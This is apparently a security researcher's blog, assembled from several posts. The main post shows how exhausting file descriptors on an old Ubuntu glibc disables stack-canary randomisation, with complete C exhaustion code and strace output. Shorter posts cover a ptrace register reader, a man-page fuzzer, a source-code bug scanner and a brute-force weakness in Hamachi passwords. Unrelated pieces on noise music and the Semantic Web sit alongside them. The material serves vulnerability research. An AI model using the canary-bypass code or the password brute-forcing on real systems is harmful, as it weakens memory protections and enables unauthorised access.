The example described bellow aims in disabling a Linux security countermeasure and possibly of other OSs which implement the same type of protection in a similar way. Note that below I am demonstrating this issue in older kernel/libc versions due to changes in the way that this protection is implemented in newer versions which protects against this.

Environment:
manos@jaunty:~/p/ke$ uname -a
Linux jaunty 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux

manos@jaunty:~/p/ke$ sudo aptitude show libc6
Package: libc6
State: installed
Automatically installed: no
Version: 2.9-4ubuntu6.3
Priority: required
Section: libs
Maintainer: Ubuntu Core developers
Uncompressed Size: 11.2M
Depends: libgcc1, findutils (>= 4.4.0-2ubuntu2)
Suggests: locales, glibc-doc, libc6-i686
Conflicts: libterm-readline-gnu-perl (< 1.15-2), tzdata (< 2007k-1),
tzdata-etch, nscd (< 2.9)
Replaces: belocs-locales-bin
Provides: glibc-2.9-1
Description: GNU C Library: Shared libraries
Contains the standard libraries that are used by nearly all programs on the
system. This package includes shared versions of the standard C library and the
standard math library, as well as many others.
*This glibc version was purposely picked.

manos@jaunty:~/p/ke$ gcc -v
..
gcc version 4.3.3 (Ubuntu 4.3.3-5ubuntu4)

First lets print out the posted poc code:

#include <sys/socket.h>
#include <sys/un.h>

static int send_fd (int unix_fd, int fd)
{
struct msghdr msgh;
struct cmsghdr *cmsg;
char buf[CMSG_SPACE (sizeof (fd))];
memset (&msgh, 0, sizeof (msgh));


memset (buf, 0, sizeof (buf));

msgh.msg_control = buf;
msgh.msg_controllen = sizeof (buf);

cmsg = CMSG_FIRSTHDR (&msgh);
cmsg->cmsg_len = CMSG_LEN (sizeof (fd));
cmsg->cmsg_level = SOL_SOCKET;


cmsg->cmsg_type = SCM_RIGHTS;

msgh.msg_controllen = cmsg->cmsg_len;

memcpy (CMSG_DATA (cmsg), &fd, sizeof (fd));
return sendmsg (unix_fd, &msgh, 0);
}

int main ()
{

int fd[2], ff[2];

int target;
if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, fd)==-1)
return 1;
for (;;)
{
if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, ff)==-1)
return 2;
send_fd (ff[0], fd[0]);
send_fd (ff[0], fd[1]);


close (fd[1]);
close (fd[0]);
fd[0] = ff[0];
fd[1] = ff[1];
}
} 

Next, we are moving to the targeted protection:

file: glibc-2.9/sysdeps/unix/sysv/linux/dl-osinfo.h

..
static inline uintptr_t __attribute__ ((always_inline))
_dl_setup_stack_chk_guard (void)
{
  uintptr_t ret;
#ifdef ENABLE_STACKGUARD_RANDOMIZE
  int fd = __open ("/dev/urandom", O_RDONLY);
  if (fd >= 0)
    {
      ssize_t reslen = __read (fd, &ret, sizeof (ret));
      __close (fd);
      if (reslen == (ssize_t) sizeof (ret))
	return ret;
    }
#endif
  ret = 0;
  unsigned char *p = (unsigned char *) &ret;
  p[sizeof (ret) - 1] = 255;
  p[sizeof (ret) - 2] = '\n';
  return ret;
}  
..

It is pretty obvious what our target is. Just in case you didn’t see it, we want to use our file exhaustion bug and disable the ENABLE_STACKGUARD_RANDOMIZE part of the code and leave only the terminator value (aka ff0a0000) which in certain situations can be overwritten and secure us EIP control.

we want this unreachable :

  if (fd >= 0)
    {
      ssize_t reslen = __read (fd, &ret, sizeof (ret));
      __close (fd);
      if (reslen == (ssize_t) sizeof (ret))
	return ret;
    }

We want fd to return something less than 0. To increase our chances of doing this we are going to modify a little bit our FD exhaustion code :

#include <sys/socket.h>
#include <sys/un.h>         
#include <stdio.h> 
#include <string.h>
#include <stddef.h>   
      
//return file-nr array - exit's when there are not enough File Descriptors     
int* nr()
{
	char line [100]; 
	FILE *filenr;
	if((filenr = fopen("/proc/sys/fs/file-nr", "r")) == NULL){printf("\nOvershoot FDs - exiting\n");exit(0);}   
	fgets ( line, sizeof line, filenr );                                 
	fclose(filenr); 
	int out[3];
	sscanf(line, "%d %d %d", &out[0],&out[1],&out[2]);	
return out;
}   

static int send_fd (int unix_fd, int fd)
{
	  struct msghdr msgh;
	  struct cmsghdr *cmsg;
	  char buf[CMSG_SPACE (sizeof (fd))];
	  memset (&msgh, 0, sizeof (msgh));
	  memset (buf, 0, sizeof (buf));
	  msgh.msg_control = buf;
	  msgh.msg_controllen = sizeof (buf);
	  cmsg = CMSG_FIRSTHDR (&msgh);
	  cmsg->cmsg_len = CMSG_LEN (sizeof (fd));
	  cmsg->cmsg_level = SOL_SOCKET;
	  cmsg->cmsg_type = SCM_RIGHTS;
	  msgh.msg_controllen = cmsg->cmsg_len;
	  memcpy (CMSG_DATA (cmsg), &fd, sizeof (fd));
	  return sendmsg (unix_fd, &msgh, 0);   
}    



int crash_loop(int loop) 
{
	
 int fd[3], ff[3];
 int count=0;

  while (count<loop)                         
  {  
	
	//Set FD lower limit for shooting out Canary          
	int *in = nr();
	int c=in[0],i=in[1],l=in[2]; 

		if (l-c<=80) 
		{
		system("strace -x -e trace=read,open ./m"); 
		}              
		    
    if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, ff)==-1)
    return 2;  	
    send_fd (ff[0], fd[0]);
    send_fd (ff[0], fd[1]);
    close (fd[1]);
    close (fd[0]);
    fd[0] = ff[0];
    fd[1] = ff[1];                        
	count++;
  }	
}

int main (int argc, char *argv[])
{    
	printf ("Start Exhaustion Loop\n");  

    while (1)
		{  
	    	crash_loop(1);
        	}
} 

What we added is some control over the loop and nr() which probes /proc/sys/fs/file-nr and gets the current used FDs and the system’s FD limit. Then we take this array and we set the lower limit of free file descriptors before attempting to “lock” access to /dev/urandom. Note that since this process is going to be un-killable we want it to stop at the point where we have no other free descriptors, hence we “exit” when we can’t open /proc/sys/fs/file-nr. We execute our victim application using strace, as we want to see all the system calls (e.g. open, read). *Note that the use of usleep might come handy if we want to stabilise our free FDs to a certain number, since the method described below is likely to be used in a waiting stabilising process form rather than executing multiple times our target program as described here.

Now let’s look our victim application :

#include <stdint.h>
#include <stdio.h>


int main(int argc, char *argv[]) 

  	{   //STACK_CHK_GUARD  -  i386    (stackguard-macros.h)    
		uintptr_t x; 
		asm ("movl %%gs:0x14, %0" : "=r" (x));
		fprintf(stderr, "Cookie [%%gs:0x14=%0lx]\n\n",x)    ; 
	}

brk(0) = 0x8b3e000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb8000000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=50808, ...}) = 0
mmap2(NULL, 50808, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ff3000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3
read(3, "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\.."..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1442180, ...}) = 0
mmap2(NULL, 1451632, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7e90000
mprotect(0xb7fec000, 4096, PROT_NONE) = 0
mmap2(0xb7fed000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x15c) = 0xb7fed000
mmap2(0xb7ff0000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ff0000
close(3) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e8f000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e8f6c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
open("/dev/urandom", O_RDONLY) = 3
read(3, "\xc9\x6e\xa8"..., 3) = 3
close(3) = 0
mprotect(0xb7fed000, 8192, PROT_READ) = 0
mprotect(0x8049000, 4096, PROT_READ) = 0
mprotect(0xb801f000, 4096, PROT_READ) = 0
munmap(0xb7ff3000, 50808) = 0
write(2, "Cookie [%gs:0x14=a86ec900]\n\n"..., 28Cookie [%gs:0x14=a86ec900]) = 28
exit_group(28) = ?

We can clearly see that :

open("/dev/urandom", O_RDONLY) = 3
read(3, "\xc9\x6e\xa8"..., 3) = 3

and our canary is a86ec900 (little endian + 1 null byte)

Now that we have everything set let’s see what happens when we execute our code:

manos@jaunty:~/p/ke$./pp&
Start Exhaustion Loop
.
.
.
open("/etc/ld.so.cache", O_RDONLY) = 3
open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3
read(3, "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x03\x00....., 512) = 512
open("/dev/urandom", O_RDONLY) = 3
read(3, "\x04\xe8\x8e"..., 3) = 3
Cookie [%gs:0x14=8ee80400]
open("/etc/ld.so.cache", O_RDONLY) = 0
open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 0
read(0, "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x03\x0.."..., 512) = 512
open("/dev/urandom", O_RDONLY) = 0
read(0, "ATX"..., 3) = 3
Cookie [%gs:0x14=58544100]
open("/etc/ld.so.cache", O_RDONLY) = 3
open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3
read(3, "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x03.."..., 512) = 512
open("/dev/urandom", O_RDONLY) = -1 ENFILE (Too many open files in system)
Cookie [%gs:0x14=a967000]
Overshoot FDs - exiting

As we can see, after some executions we managed to block ENABLE_STACKGUARD_RANDOMIZE with an ENFILE error and jump straight after the if statement. Clearly we should have seen ff0a0000 here. After some more tries we observe the following canary values (for fd =-1) :

..
0xe8537000
0x1c0d7000
0x146c7000
0xe8b0f000
0x1d487000
0x13d2f000
0x15caf000
0x7c3f000
0xe1b47000
0x6e77000
0xe5a47000
0x1ab7f000
0xf4237000
0x1978f000
0xe584f000
0x5287000
0x18de7000
0xb517000
0x1311f000
0xf1f47000
0x310f000
0xfe0b7000
0xf7ccf000
0xff2ff000
0xf8d07000
0x6e77000
0xf35ef000
0xf0f07000
0xe21af000
0xf1b57000
0xb71f000
0x1c0d7000
0xe9f5f000
0xe832f000
0xe8f1f000
0xed26f000
0xee4b7000
0x83cf000
0xeb1e7000
0xc0c7000
0xf9f4f000
..

Some modification is happening on the terminator canary.

If we get libc6 along with glibc_2.9-4ubuntu6.3.diff and inspect the patch, we see the following lines added within dl-osinfo.h :

+@@ -77,5 +80,31 @@
+   unsigned char *p = (unsigned char *) &ret;
+   p[sizeof (ret) - 1] = 255;
+   p[sizeof (ret) - 2] = '\n';
++#ifdef HP_TIMING_NOW
++  hp_timing_t hpt;
++  HP_TIMING_NOW (hpt);
++  hpt = (hpt & 0xffff) << 8;
++  ret ^= hpt;
++#endif
++  uintptr_t stk;
++  /* Avoid GCC being too smart.  */
++  asm ("" : "=r" (stk) : "r" (p));
++  stk &= 0x7ffff0;
++#if __BYTE_ORDER == __LITTLE_ENDIAN
++  stk <<= (__WORDSIZE - 23);
++#elif __WORDSIZE == 64
++  stk <<= 31;
++#endif
++  ret ^= stk;
++  /* Avoid GCC being too smart.  */
++  p = (unsigned char *) &errno;
++  asm ("" : "=r" (stk) : "r" (p));
++  stk &= 0x7fff00;
++#if __BYTE_ORDER == __LITTLE_ENDIAN
++  stk <<= (__WORDSIZE - 29);
++#else
++  stk >>= 8;
++#endif
++  ret ^= stk;
+   return ret; ;      

This patch is XORing the value of ret (terminator value) with the current CPU tick counter (taken from rdtsc). Then the array’s (p) address is used (as additional entropy) and the rest can be replicated by us, so the patch adds some fair and cheap trickery (poor man’s randomisation) – *while I was writing this post, this was published, which shows that windows kernel mode canary generation is similar to the above.

To make sure that a glibc version without the stack-guard-quick-randomization.diff applied is giving ff0a0000 (even though we can confirm this with strace), we recompile glibc without this patch. This will save us some time of looking around to find a distro without this patch applied (we just comment out all XOR operations).

So lets run pp again :
manos@jaunty:~/p/ke$./pp&
Start Exhaustion Loop
.
.
.
[b80a70d4] open("/etc/ld.so.cache", O_RDONLY) = 0
[b80a70d4] open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 0
[b80a7154] read(0, "\x7f\x45\x4c\x46\x01\x01\x01\x00.."..., 512) = 512
[b80a70d4] open("/dev/urandom", O_RDONLY) = 0
[b80a7154] read(0, "\x17\x7f\x77"..., 3) = 3
Cookie [%gs:0x14=777f1700]
[b7f7e0d4] open("/etc/ld.so.cache", O_RDONLY) = 3
[b7f7e0d4] open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3
[b7f7e154] read(3, "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\..."..., 512) = 512
[b7f7e0d4] open("/dev/urandom", O_RDONLY) = 3
[b7f7e154] read(3, "\x70\xec\x1e"..., 3) = 3
Cookie [%gs:0x14=1eec7000]
[b80f10d4] open("/etc/ld.so.cache", O_RDONLY) = 0
[b80f10d4] open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 0
[b80f1154] read(0, "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00..."..., 512) = 512
[b80f10d4] open("/dev/urandom", O_RDONLY) = 0
[b80f1154] read(0, "\x64\x95\xb7"..., 3) = 3
Cookie [%gs:0x14=b7956400]
[b808a0d4] open("/etc/ld.so.cache", O_RDONLY) = 3
[b808a0d4] open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3
[b808a154] read(3, "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00..."..., 512) = 512
[b808a0d4] open("/dev/urandom", O_RDONLY) = -1 ENFILE (Too many open files in system)
Cookie [%gs:0x14=ff0a0000]
Overshoot FDs - exiting

We are now certain that a simple File Descriptor exhaustion bug can assist in disabling canary stack randomisation. It is worth mentioning that /dev/urandom was dropped mainly on performance and not security implications of FD hijacking or shortage.

As this post is focused on disabling the ENABLE_STACKGUARD_RANDOMIZE we are not going to analyse ways of guessing/determing stack-guard-quick-randomization.diff entropy points, however going back to the patched version and based solely on visual canary value observations, we can see that we significantly reduced the canary space from 16777215 to almost 65535. rdtsc can be predicted with some decent accuracy in a low/medium usage uniprocessor systems, during non-context switched execution, but we save this for another time.

Below is a simple patch for strace – which prints rdtsc at each “syscal exit” (trace_syscall_exiting) – It is not accurate but it can be used for roughly observing tick jumps

--- syscall.c
+++ syscall.c
@@ -109,7 +109,7 @@
 #define TN TRACE_NETWORK
 #define TP TRACE_PROCESS
 #define TS TRACE_SIGNAL
-
+#define HP_TIMING_NOW(Var)	__asm__ __volatile__ ("rdtsc" : "=A" (Var))
 static const struct sysent sysent0[] = {
 #include "syscallent.h"
 };
@@ -2520,7 +2520,8 @@
 			(long) tv.tv_sec, (long) tv.tv_usec);
 	}
 	printtrailer();
-
+	HP_TIMING_NOW (hpt);
+	tprintf(" rdtsc : %lld   ",hpt );
 	dumpio(tcp);
 	if (fflush(tcp->outf) == EOF)
 		return -1;

The output of strace with the rdtsc out is :
execve("./m", ["./m"], [/* 20 vars */]) = 0
rdtsc : 170812617327520 brk(0) = 0x9a62000
rdtsc : 170812617944640 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
rdtsc : 170812618580380 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb8083000
rdtsc : 170812618926180 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
rdtsc : 170812619351780 open("/etc/ld.so.cache", O_RDONLY) = 3
rdtsc : 170812619758760 fstat64(3, {st_mode=S_IFREG|0644, st_size=50808, ...}) = 0
rdtsc : 170812620131160 mmap2(NULL, 50808, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb8076000
rdtsc : 170812620421100 close(3) = 0
rdtsc : 170812620785520 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
rdtsc : 170812621126000 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3
rdtsc : 170812621530320 read(3, "\177ELF\1\1\1\3\3\1\320h\1004"..., 512) = 512
rdtsc : 170812621830900 fstat64(3, {st_mode=S_IFREG|0755, st_size=1442180, ...}) = 0
rdtsc : 170812622221920 mmap2(NULL, 1451632, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7f13000
rdtsc : 170812622559740 mprotect(0xb806f000, 4096, PROT_NONE) = 0
rdtsc : 170812622852340 mmap2(0xb8070000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x15c) = 0xb8070000
rdtsc : 170812623144940 mmap2(0xb8073000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb8073000
rdtsc : 170812623490740 close(3) = 0
rdtsc : 170812623831220 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f12000
rdtsc : 170812624230220 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7f126c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
rdtsc : 170812624568040 open("/dev/urandom", O_RDONLY) = 3
rdtsc : 170812624900540 read(3, "\247\33'", 3) = 3
rdtsc : 170812625185160 close(3) = 0
rdtsc : 170812625453820 mprotect(0xb8070000, 8192, PROT_READ) = 0
rdtsc : 170812626110840 mprotect(0x8049000, 4096, PROT_READ) = 0
rdtsc : 170812626430040 mprotect(0xb80a2000, 4096, PROT_READ) = 0
rdtsc : 170812626757220 munmap(0xb8076000, 50808) = 0
rdtsc : 170812627081740 write(2, "\nUSAGE: 1 (print Canary), 2 (ter"..., 52
USAGE: 1 (print Canary), 2 (terminator owerwrite)) = 52
rdtsc : 170812627674920 exit_group(52) = ?


For other possible FD exhaustion targets you can look here.

I didn’t explain some things since they have been discussed before, so if you have unanswered questions have a look below :

First I had to write the C part of it, for the instrumentation. A simple way to get the registers is to use ptrace. First we attach to a process, then we get the register, then we detach and finally return the value.

For this to work as a ruby module we have to use the ruby.h

#include "ruby.h"
#include <unistd.h>
#include <linux/ptrace.h>
#include <sys/user.h> 

VALUE RegInfo = Qnil;
void Init_reginfo();

VALUE method_getr(VALUE self,VALUE arg,VALUE pid);

void Init_reginfo()
{
        RegInfo = rb_define_module("RegInfo");
        rb_define_method(RegInfo, "getr", method_getr,2 );
}

VALUE method_getr(VALUE self, VALUE arg, VALUE pid)
{
	char* input=RSTRING_PTR(arg);
	pid_t  process = NUM2INT(pid);
	struct user_regs_struct registers;
	long out=0;
	char outreg[10];
	ptrace(PTRACE_ATTACH,process,0,0); //attach to process
	waitpid(process,NULL,0);
	ptrace(PTRACE_GETREGS,process,&registers,&registers); //get'em
	if (!strncasecmp(input,"eax",3)){out = registers.eax;}  //make sure we don't cmpr case
	else if (!strncasecmp(input,"edx",3)){out = registers.edx;}
	else if (!strncasecmp(input,"ebx",3)){out = registers.ebx;}
	else if (!strncasecmp(input,"ecx",3)){out = registers.ecx;}
	else if (!strncasecmp(input,"ebp",3)){out = registers.ebp;}
	else if (!strncasecmp(input,"esi",3)){out = registers.esi;}
	else if (!strncasecmp(input,"eip",3)){out = registers.eip;}
	else {out =  registers.eip;} //default
	ptrace(PTRACE_DETACH,process,0,0); //detach from process
	snprintf(outreg,10,"%lx",out);
	return rb_str_new2(outreg);
}

</pre>
</div>
<div id="_mcePaste" style="position: absolute; left: -10000px; top: 0px; width: 1px; height: 1px; overflow-x: hidden; overflow-y: hidden;">

Next it’s straight forward, we create an extconf.rb file which when we execute generates the Makefile which will compile our module.

require 'mkmf'
extension_name = 'reginfo'
dir_config(extension_name)
create_makefile(extension_name)

And an example

require 'reginfo'
include  RegInfo

pid = fork do
system("tail -f txt")
end

puts getr("eip",pid) #here we get EIP

The above  prints something like b7f577d8

You can download reginfo from here, the source code from here and project updates here.

This is a very simple linux module at the moment that performs only this specific task, more functionality will be added soon. If you are looking for something a bit more elaborate, have a look at METASM.

A couple of months ago Pascal Cretain invited me to participate in a very interesting project. A bunch of security people and a bunch of noise artists were going to collaborate, the mission was : The Noisicians will have “Subversive Computing” as their central theme, and the Subversive Technologists will work with “Noise”.

Noise vs. Subversive Computing

This may not sound very complex, but it is! Despite what we use noise for and what our perception of noise is, it is not easy to generate, compose and generally conceive it in a controlled and meaningful way. Cacophony or atonality can very quickly displease, due to the surprise element which is usually generated by abnormal db fluctuations.

Having all these in mind, I start thinking of a way to create a natural sound (around noise) which will assist in creating a visually familiar image, without surprising the listener too much.

The idea that popped into my mind was to generate an audible version of a Rainbow. To do that I chose to use what it is known as the “Colors of Noise“, which refers to the power distribution in frequency spectrum of different types of noise.

If you think that it is easy to create different types of noise, then I have to assume that you haven’t tried. For my experiments I used the tools included in the CCRMA, and more specifically CLM (Common Lisp Music) and SND (Sound editor).

I also used several of the example scripts that come with these packages and in cases that I couldn’t create a specific “colour”, I used a bit of artistic license and normal mixing (subtractive and additive) e.g. yellow + red = orange.

Example script to generate Green Noise (bounded brownian noise) :
(definstrument (green3 start dur freq amp amp-env noise-freq noise-width noise-max-step)
(let* ((grn (make-green-noise-interp :frequency noise-freq
:amplitude noise-max-step
:high (* 0.5 noise-width) :low (* -0.5 noise-width)))
(osc (make-oscil freq))
(e (make-env amp-env :scaler amp :duration dur))
(beg (seconds->samples start))
(end (+ beg (seconds->samples dur))))
(run
(lambda ()
(do ((i beg (+ 1 i)))
((= i end))
(outa i (* (env e)
(+ 1.0 (green-noise-interp grn))
(oscil osc))))))))

(with-sound ()
(green3 0 2.0 440 .5 '(0 0 1 1 2 1 3 0) 100 .2 .02))


Finally, all colours mix with the prior colour/s right after they introduce themselves.
Something like : Colours[0], Colours[1], Colours[0]+Colours[1], Colours[2], .........

On the foreground , there is a minimalistic piano composition which tries to not distract too much from the background colours and helps in assisting the after rain “Rainbow” effect.

Noise vs. Subversive Computing

For more information about the project, the participants and their very interesting ideas,
visit : http://www.myspace.com/pascalcretain

The compilation has been released with
Computationally Infeasible Records

Looking at the latest JCrypTool version, it is apparent that there are vast design improvements, it is also more modular, which makes the extensibility of the project a very easy task. There are several algorithms to use, symmetric, assymetric, hash, MAC etc. So there are lots of things to play with!

Diffie-Hellman /AES

In the Cryptanalysis part of the tool, there is a Columnar Transposition module, Frequency analysis graphs, aFriedman Test function and a Vigenere analyser/helper, so there is space for additions. Speaking of additions, I particularly like the plugins architecture in use, which makes the project very interesting indeed.

Frequency Analysis / Shark

In the past, I developed a simple cryptanalysis tool which I am now intending to move into JCrypTool in the form of a plugin and possibly doing the same for a very old project.

I recommend you go and have a look at it.

This article is kept just for reference. I will try to package the source code and give it as a download at some point.

Anyway, to cut a long story short, utilising jQuery, Google Code Search API and Bugle, I created an automated version of the Bugle project which looks as close as possible to a desktop based source code review tool.

To demonstrate Bugle Automated I will be looking for bugs in Samba. The first step is to add the package you want to inspect in the Scan field, as you can see below there is Auto Complete functionality available suggesting possible packages while you type a name.

After choosing a package, press scan an Bugle will do the rest.

The first screen you see is a bit empty , both the Main Panel and the Stats Panel will load as soon as you choose a vulnerability category from the left side. Bugle displays the number of issues of each category, so you can immediately get an general idea on where you might find a bug.

As soon as you choose a category a sub menu will be revealed, presenting all the different signatures in that category. At the same time the statistics Panel will load and all the relevant graphs for the project/categories and categories/signatures will be displayed.

Next we choose the Buffer Overflows category, with 205 hits and then the Generic BoF signature (with 50 hits). The Main Panel loads and then we can see each individual line with a possible bug. We scroll down until we find something that could be a vulnerability and click on that line.

We click the Line 117 of samba-1.9.15p8.mvs/source/sockspy.c and we inspect the code in the Code Snippet dialog. Then we scroll down until we find the line with the yellow highlighted text

We can see that strcpy(DestHost,argv[1]); is copying the arv[1] into the DestHost buffer which has 256 chars size. Now we can guess that if we pass in the command line DestHost larger than 256 chars we can create a buffer overflow condition. (Note that this bug in sockspy.c is in a very very very old version of Samba)

That’s Bugle Auto Scanner, hopefully this will assist in discovering and fixing bugs out there.

In this paper, we introduce a mode of operation that can be applied to any existing or future hash function in order to improve its collision resistance. In particular, we use steganography, the art of hiding a message into another message, to create a scheme, named Σ-Hash, which enforces the security of hashing algorithms. We will demonstrate how, apart from hash function security, Σ-Hash can also be used for securing Open Source code from tampering attacks and other applications.

Conference: SECRYPT – International Conference on Security and Cryptography, Spain 2007
Authors: Emmanouel Kellinis and Konstantinos Papapanagiotou

If you need more information about this paper, get in touch.

The format which man pages follow is universal (mostly), so it is not very difficult to make a script and extract the offered options – which is exactly what gave me the idea of making a tool that can generate fuzzing data based on manual pages. Based on that concept we can fuzz as accurately as possible any command that has a man page.

So lets take a command and generate fuzzing data.

The choice for this example is “shar” - GNU sharutils 4.2.1

Shar creates “shell archives” (or shar files) which are in text format and can be mailed. These files may be unpacked later by executing them with /bin/sh. The resulting archive is sent to standard out unless the -o option is given.

Below you can see how a man page looks in the console

or have a look at the On-line Shar Manual pageThere are several options available for this command and therefore the fuzzer has to generate lots of combinations. Fuzzman catches signals so if you see that you have enough combinaitons you can press ctrl-c.
if you type ./fuzzman.pl shar you get :

=== Extract arguments for "shar" ===
STANDARD
: --version
: --print-text-domain-dir
: --help
: --version
: -q
: -p
: -Z
: -S
: -z
: -o
: -l
: -L
: -n
.
.
.
: --no-i18n
: --print-text-domain-dir
ADDITIONAL
: EXTRA BoF Arg
: EXTRA Format String Arg
: EXTRA Numbers Arg

:Number of Arguments :36 <=== it is not 100% accurate but is very close

=== Generate Fuzzing Script ===
+STOP GENERATOR WITH CTRL-C
:Agrument combinations : 1040 <== This is the combinations counter
:Partial shar.sh, not all combinations have been generated
:Run fuzzing script [sh shar.sh]

We can see above that there are approximately 36 options. That would create several thousand combinations so I stopped it at 1040 combinations. Fuzzman tried different options adding arguments that could potentially lead to different overflow types, now the shar.sh script is ready.

Starting the shar.sh will execute the command 1040 times.

As we can see above we hit into a bug, Segmentation fault is always a sign.

You can download Fuzzman from here,
Enjoy

Note: This version of Sharutils have been reported for both Buffer Overflow and Format string vulns some time ago (here and here)

Detect Networks script Detect-hamachi.pl

After that the next step was to see if the system returns a distinctive error if the network picked is correct but the password supplied is wrong. Again that proved to be the case, so the next step was to check on the network I created if there is any account lockout or IP blocking if I submit the wrong password several times. I send the wrong password 10 times and the account was still active. When considering the fact that someone creates a VPN to establish a secure tunnel between private assets this can be considered as an immediate security threat.

At this stage I modified the previous tiny script to go through a list of passwords given a valid network name and the result was predictebale, found the valid password and join the network.

Find valid Hamachi passwords script beef-hamachi.pl

A fast solution to the issue described is to “Block new network members by default”, there is an option in the Security tab to do that.

All of the above are very simple observations, nothing on the protocol or implementation as such (also as far as I am concerned the project is closed source at the moment). Haven’t used it that much so if you see something wrong in here let me know.

These scripts work only in linux and you need to have perl and hamachi installed. Have a look at http://files.hamachi.cc/linux/README on how to install in linux , note in Debian you need to create the /dev/net/tun device to make it work.

mkdir /dev/net/tun
mknod /dev/net/tun c 10 200

Note: The provided scripts are only for illustration purpose, use them only on networks you own.

“The bane of my existence is doing things that I know the computer could do for me.” — Dan Connolly, The XML Revolution

In 1989, Tim Berners-Lee, a British researcher working at CERN (Conseil European pour la Recherche Nucleaire), envisioned the birth of a linked information system that would offer efficient access to data, regardless of the program or terminal in use. That led to the creation of the World Wide Web. Nowadays, the essential property of the World Wide Web is its universality. This constitutes both power and weakness, as anything can be found but the amount of information included is enormous and thus unmanageable. In order to confront the problem of information proliferation, changes have to be made to the current structure of the Web. Along these lines, Tim Berners-Lee proposed the reformation of the Web, as it exists, to the “Semantic Web”. As Berners-Lee argues “the Semantic Web is not a separate Web but an extension of the current one, in which information is given well-defined meaning, better enabling computers and people to work in co-operation�the challenge of the Semantic Web, therefore, is to provide a language that expresses both data and rules for reasoning about the data and that allows rules from any existing knowledge-representation system to be exported onto the Web” (Berners-Lee et al. 2001).

So, the Semantic Web should provide enhanced information access based on the exploitation of machine-processable metadata. Facilities to put machine-understandable data on the Web are becoming a high priority for many communities. The Web can reach its full potential only if it becomes a place where data can be shared and processed by automated tools as well as by people. For the Web to scale, tomorrow’s programs must be able to share and process data even when these programs have been designed totally independently. The Semantic Web is a vision: the idea of having data on the Web defined and linked in a way that it can be used by machines not just for display purposes, but for automation, integration and reuse of data across various applications (W3C 2002).

But in order for the Semantic Web to become successful, it has to be based on the principles that made the current World Wide Web successful. According to Goble (2003) these are its scalability, by challenging assumptions on link consistency and completeness, and its simplicity. So the challenges that emerge for the semantic technologies to be brought in the Web are (Goble 2003):

• � The Web is vast, so solutions have to scale. Reasoning engines must perform quickly and robustly.
• The Web is here–we have a legacy so we will have a mixed environment where some resources are “semantic” and some are just “Web”. We must have a clear and achievable migration path from non-semantic to semantic.
• The Web is democratic–all are knowledge acquisition experts and all are knowledge modellers. The barriers of admission must be low enough for most users to participate to the degree that is appropriate for them.
• The Web grows from the bottom. Most people wrote their first HTML by editing a third parties. The Semantic Web will arise from fragments of metadata copied in a similar way.
• The Web is volatile and changeable–resources appear and disappear, resources change.
• The Web is dirty–there is no way to ensure consistency or whether information is trustworthy, and provenance is unknown. However, tolerance of error does not necessarily mean one should be oblivious to it.
• The Web is heterogeneous–no one solution or one technology will be adopted; no one set of metadata will apply to a resource. Agreements are difficult, and mappings and translations will be common place.

